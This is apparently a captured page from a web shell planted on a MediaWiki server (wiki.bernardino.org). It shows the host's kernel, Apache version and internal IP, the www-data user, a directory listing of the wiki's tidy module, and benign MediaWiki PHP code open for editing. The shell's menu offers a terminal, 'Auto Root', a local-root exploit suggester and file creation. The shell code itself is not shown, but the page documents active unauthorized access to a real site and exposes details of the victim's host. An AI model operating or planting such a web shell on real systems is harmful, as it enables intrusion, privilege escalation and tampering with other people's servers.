Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
includes /
tidy /
Delete
Unzip
Name
Size
Permission
Date
Action
Balancer.php
102.94
KB
-rw-r--r--
2016-11-28 20:20
Html5Depurate.php
1.34
KB
-rw-r--r--
2016-11-28 20:20
Html5Internal.php
372
B
-rw-r--r--
2016-11-28 20:20
RaggettBase.php
1.39
KB
-rw-r--r--
2016-11-28 20:20
RaggettExternal.php
2.17
KB
-rw-r--r--
2016-11-28 20:20
RaggettInternalHHVM.php
819
B
-rw-r--r--
2016-11-28 20:20
RaggettInternalPHP.php
1.31
KB
-rw-r--r--
2016-11-28 20:20
RaggettWrapper.php
2.93
KB
-rw-r--r--
2016-11-28 20:20
TidyDriverBase.php
821
B
-rw-r--r--
2016-11-28 20:20
tidy.conf
679
B
-rw-r--r--
2016-11-28 20:20
Save
Rename
<?php namespace MediaWiki\Tidy; class RaggettInternalPHP extends RaggettBase { /** * Use the HTML tidy extension to use the tidy library in-process, * saving the overhead of spawning a new process. * * @param string $text HTML to check * @param bool $stderr Whether to read result from error status instead of output * @param int &$retval Exit code (-1 on internal error) * @return string|null */ protected function cleanWrapped( $text, $stderr = false, &$retval = null ) { if ( !class_exists( 'tidy' ) ) { wfWarn( "Unable to load internal tidy class." ); $retval = -1; return null; } $tidy = new \tidy; $tidy->parseString( $text, $this->config['tidyConfigFile'], 'utf8' ); if ( $stderr ) { $retval = $tidy->getStatus(); return $tidy->errorBuffer; } $tidy->cleanRepair(); $retval = $tidy->getStatus(); if ( $retval == 2 ) { // 2 is magic number for fatal error // http://www.php.net/manual/en/function.tidy-get-status.php $cleansource = null; } else { $cleansource = tidy_get_output( $tidy ); if ( !empty( $this->config['debugComment'] ) && $retval > 0 ) { $cleansource .= "<!--\nTidy reports:\n" . str_replace( '-->', '-->', $tidy->errorBuffer ) . "\n-->"; } } return $cleansource; } public function supportsValidate() { return true; } }